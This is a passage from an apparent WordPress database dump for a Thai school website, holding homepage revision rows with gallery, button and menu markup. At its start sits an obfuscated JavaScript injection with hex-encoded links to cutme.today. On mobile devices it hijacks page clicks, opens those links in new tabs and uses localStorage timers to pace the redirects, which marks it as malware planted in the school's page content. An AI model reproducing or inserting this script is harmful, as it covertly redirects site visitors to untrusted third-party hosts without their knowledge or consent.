_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:03:44','2024-08-08 14:03:44','',14,'http://pakhaeng.ssk.in.th/?p=734',0,'revision','',0),
(735,1,'2024-08-08 21:05:05','2024-08-08 14:05:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 